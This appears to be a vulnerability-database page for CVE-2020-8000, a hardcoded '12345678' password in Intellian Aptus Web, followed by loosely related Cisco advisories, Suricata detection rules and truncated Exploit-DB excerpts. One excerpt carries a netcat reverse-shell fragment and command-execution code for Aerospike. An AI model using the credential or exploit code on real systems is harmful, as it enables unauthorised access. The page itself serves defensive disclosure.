CVE-2020-8000
published 2020-01-27CVE-2020-8000: Intellian Aptus Web 1.24 has a hardcoded password of 12345678 for the intellian account.
PriorityP357critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
2.40%
82.0th percentile
Intellian Aptus Web 1.24 has a hardcoded password of 12345678 for the intellian account.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intelliantech | aptus_web | — | — |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_cisco8.8HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v56r-cxxj-7vxh: Intellian Aptus Web 1
ghsa_unreviewed·2022-05-24
CVE-2020-8000 [HIGH] GHSA-v56r-cxxj-7vxh: Intellian Aptus Web 1
Intellian Aptus Web 1.24 has a hardcoded password of 12345678 for the intellian account.
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
vendor_cisco·2020-10-07·CVSS 8.8
CVE-2020-3544 [HIGH] CWE-119 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
A vulnerability in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute arbitrary code on an affected device or cause the device to reload.
This vulnerability is due to missing checks when an IP camera processes a Cisco Discovery Protocol packet. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to an affected device. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition.
Note: Cisco Discove
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
vendor_cisco·2020-10-07·CVSS 6.5
CVE-2020-3543 [MEDIUM] CWE-400 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
A vulnerability in the Cisco Discovery Protocol of Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause a memory leak, which could lead to a denial of service (DoS) condition on an affected device.
The vulnerability is due to incorrect processing of certain Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending certain Cisco Discovery Protocol packets to an affected device. A successful exploit could allow the attacker to cause the affected device to continuously consume memory, which could cause the device to crash and reload, resulting in a DOS condition.
Note: Cisco Discovery Protocol is a Layer 2 pr
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
vendor_cisco·2020-08-19·CVSS 6.5
CVE-2020-3505 [MEDIUM] CWE-400 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
A vulnerability in the Cisco Discovery Protocol of Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause a memory leak, which could lead to a denial of service (DoS) condition on an affected device.
The vulnerability is due to incorrect processing of certain Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending certain Cisco Discovery Protocol packets to an affected device. A successful exploit could allow the attacker to cause the affected device to continuously consume memory, which could cause the device to crash and reload, resulting in a DOS condition.
Note: Cisco Discovery Protocol is a Layer 2 pr
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
vendor_cisco·2020-08-19·CVSS 8.8
CVE-2020-3506 [HIGH] CWE-20 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
Multiple vulnerabilities in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP camera.
These vulnerabilities are due to missing checks when the IP cameras process a Cisco Discovery Protocol packet. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol packet to the targeted IP camera. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition.
Note: C
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
vendor_cisco·2020-02-05·CVSS 8.8
CVE-2020-3110 [HIGH] CWE-20 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
A vulnerability in the Cisco Discovery Protocol implementation for the Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP Camera.
The vulnerability is due to missing checks when processing Cisco Discovery Protocol messages. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to the targeted IP Camera. A successful exploit could allow the attacker to expose the affected IP Camera for remote code execution or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition.
Note: Cisco Discov
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
vendor_cisco·CVSS 3.1
CVE-2020-3505 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
CVE-2020-3505: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
A vulnerability in the Cisco Discovery Protocol of Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause a memory leak, which could lead to a denial of service (DoS) condition on an affected device. The vulnerability is due to incorrect processing of certain Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending certain Cisco Discovery Protocol packets to an affected device. A successful exploit could allow the attacker to cause the affected device to continuously consume memory, which could cause the device to crash and reload, resulting in a DOS condition. Note: Cisco Discovery Protocol is
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
vendor_cisco·CVSS 3.0
CVE-2020-3110 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
CVE-2020-3110: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
A vulnerability in the Cisco Discovery Protocol implementation for the Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP Camera. The vulnerability is due to missing checks when processing Cisco Discovery Protocol messages. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to the targeted IP Camera. A successful exploit could allow the attacker to expose the affected IP Camera for remote code execution or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition. Note
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
vendor_cisco·CVSS 3.1
CVE-2020-3506 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
CVE-2020-3506: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
Multiple vulnerabilities in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP camera. These vulnerabilities are due to missing checks when the IP cameras process a Cisco Discovery Protocol packet. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol packet to the targeted IP camera. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condi
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
vendor_cisco·CVSS 3.1
CVE-2020-3507 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
CVE-2020-3507: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerabilities
Multiple vulnerabilities in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP camera. These vulnerabilities are due to missing checks when the IP cameras process a Cisco Discovery Protocol packet. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol packet to the targeted IP camera. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condi
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
vendor_cisco·CVSS 3.1
CVE-2020-3544 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
CVE-2020-3544: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service Vulnerability
A vulnerability in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute arbitrary code on an affected device or cause the device to reload. This vulnerability is due to missing checks when an IP camera processes a Cisco Discovery Protocol packet. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to an affected device. A successful exploit could allow the attacker to execute code on the affected IP camera or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition. Note:
Cisco
Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
vendor_cisco·CVSS 3.1
CVE-2020-3543 Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
CVE-2020-3543: Cisco Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak Vulnerability
A vulnerability in the Cisco Discovery Protocol of Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to cause a memory leak, which could lead to a denial of service (DoS) condition on an affected device. The vulnerability is due to incorrect processing of certain Cisco Discovery Protocol packets. An attacker could exploit this vulnerability by sending certain Cisco Discovery Protocol packets to an affected device. A successful exploit could allow the attacker to cause the affected device to continuously consume memory, which could cause the device to crash and reload, resulting in a DOS condition. Note: Cisco Discovery Protocol is
Suricata
ET EXPLOIT SaltStack Salt Exploitation Inbound M3 (CVE-2020-16846)
suricata·2025-03-03·CVSS 9.8
CVE-2020-16846 [CRITICAL] ET EXPLOIT SaltStack Salt Exploitation Inbound M3 (CVE-2020-16846)
ET EXPLOIT SaltStack Salt Exploitation Inbound M3 (CVE-2020-16846)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] 8000 (msg:"ET EXPLOIT SaltStack Salt Exploitation Inbound M3 (CVE-2020-16846)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/run"; startswith; http.request_body; content:"|22|client|22|"; content:"|22|ssh|22|"; within:8; content:"|22|ssh_priv|22|"; fast_pattern; content:"|22 7c|"; within:5; reference:url,github.com/sudohyak/suricata-rules/blob/main/CVE-2020-16846/CVE-2020-16846.rules; reference:cve,2020-16846; classtype:web-application-attack; sid:2060515; rev:1; metadata:attack_target Server, created_at 2025_03_03, cve CVE_2020_16846, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updat
Suricata
ET EXPLOIT SaltStack Salt Exploitation Inbound M4 (CVE-2020-16846)
suricata·2025-03-03·CVSS 9.8
CVE-2020-16846 [CRITICAL] ET EXPLOIT SaltStack Salt Exploitation Inbound M4 (CVE-2020-16846)
ET EXPLOIT SaltStack Salt Exploitation Inbound M4 (CVE-2020-16846)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] 8000 (msg:"ET EXPLOIT SaltStack Salt Exploitation Inbound M4 (CVE-2020-16846)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/run"; startswith; http.request_body; content:"|22|ssh_port|22|"; fast_pattern; content:"|22|"; within:4; pcre:"/^[^\x22]+\x2f/R"; content:"|22|client|22|"; content:"|22|ssh|22|"; within:8; reference:url,github.com/sudohyak/suricata-rules/blob/main/CVE-2020-16846/CVE-2020-16846.rules; reference:cve,2020-16846; classtype:web-application-attack; sid:2060516; rev:1; metadata:attack_target Server, created_at 2025_03_03, cve CVE_2020_16846, deployment Perimeter, deployment Internal, signature_severity Major, tag Exploit,
Suricata
ET EXPLOIT SaltStack Salt Exploitation Inbound M2 (CVE-2020-16846)
suricata·2025-03-03·CVSS 9.8
CVE-2020-16846 [CRITICAL] ET EXPLOIT SaltStack Salt Exploitation Inbound M2 (CVE-2020-16846)
ET EXPLOIT SaltStack Salt Exploitation Inbound M2 (CVE-2020-16846)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] 8000 (msg:"ET EXPLOIT SaltStack Salt Exploitation Inbound M2 (CVE-2020-16846)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/run"; startswith; http.request_body; content:"ssh_port="; fast_pattern; pcre:"/^[^&]+\x2f/R"; content:"|22|client|22|"; content:"|22|ssh|22|"; within:8; reference:url,github.com/sudohyak/suricata-rules/blob/main/CVE-2020-16846/CVE-2020-16846.rules; reference:cve,2020-16846; classtype:web-application-attack; sid:2060514; rev:1; metadata:attack_target Server, created_at 2025_03_03, cve CVE_2020_16846, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Expl
Suricata
ET EXPLOIT SaltStack Salt Exploitation Inbound M1 (CVE-2020-16846)
suricata·2021-01-07·CVSS 9.8
CVE-2020-16846 [CRITICAL] ET EXPLOIT SaltStack Salt Exploitation Inbound M1 (CVE-2020-16846)
ET EXPLOIT SaltStack Salt Exploitation Inbound M1 (CVE-2020-16846)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] 8000 (msg:"ET EXPLOIT SaltStack Salt Exploitation Inbound M1 (CVE-2020-16846)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/run"; startswith; http.request_body; content:"client=ssh"; fast_pattern; content:"ssh_priv="; content:"%20"; distance:0; reference:cve,2020-16846; reference:url,github.com/sudohyak/suricata-rules/blob/main/CVE-2020-16846/CVE-2020-16846.rules; reference:cve,2020-16846; classtype:web-application-attack; sid:2031495; rev:1; metadata:attack_target Server, created_at 2021_01_07, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Gene
Exploit-DB
Aerospike Database 5.1.0.3 - OS Command Execution
exploitdb·2020-11-17·CVSS 9.8
CVE-2020-13151 [CRITICAL] Aerospike Database 5.1.0.3 - OS Command Execution
Aerospike Database 5.1.0.3 - OS Command Execution
---
# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
# Date: 2020-08-01
# Exploit Author: Matt S
# Vendor Homepage: https://www.aerospike.com/
# Version: &1|nc {ip} {port} >/tmp/ft&'
def _get_client(cfg):
try:
return aerospike.client({
'hosts': [(cfg.ahost, cfg.aport)],
'policies': {'timeout': 8000}}).connect()
except Exception as e:
print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
def _send(client, cfg, _cmd):
try:
print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd]))
except Exception as e:
print(f"[-] UDF execution returned {e.msg}")
def _register_udf(client, cfg):
try:
client.udf_put(cfg.udfpath)
except Exception as e:
print(f"[-] whoops, couldn't registe
Exploit-DB
Cayin Signage Media Player 3.0 - Remote Command Injection (root)
exploitdb·2020-06-04
Cayin Signage Media Player 3.0 - Remote Command Injection (root)
Cayin Signage Media Player 3.0 - Remote Command Injection (root)
---
# Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root)
# Author:LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A
#!/usr/bin/env python3
#
#
# Cayin Signage Media Player 3.0 Root Remote Command Injection
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: SMP-8000QD v3.0
# SMP-8000 v3.0
# SMP-6000 v3.0 Build 19025
# SMP-6000 v1.0 Build 14246
# SMP-6000 v1.0 Build 14199
# SMP-6000 v1.0 Build 14167
# SMP-6000 v1.0 Build 14097
# SMP-6000 v1.0 Build 14090
# SMP-6000 v1.0 Build 14069
# SMP-6000 v1.0 Build 14062
# SMP-4000 v1.0 Build 14098
# SMP-4000 v1.0 Build 14092
# SMP-4000 v1.0 Build 14087
# SMP-2310 v3.0
# SMP-2300 v3.0
No writeups or analysis indexed.
2020-01-27
Published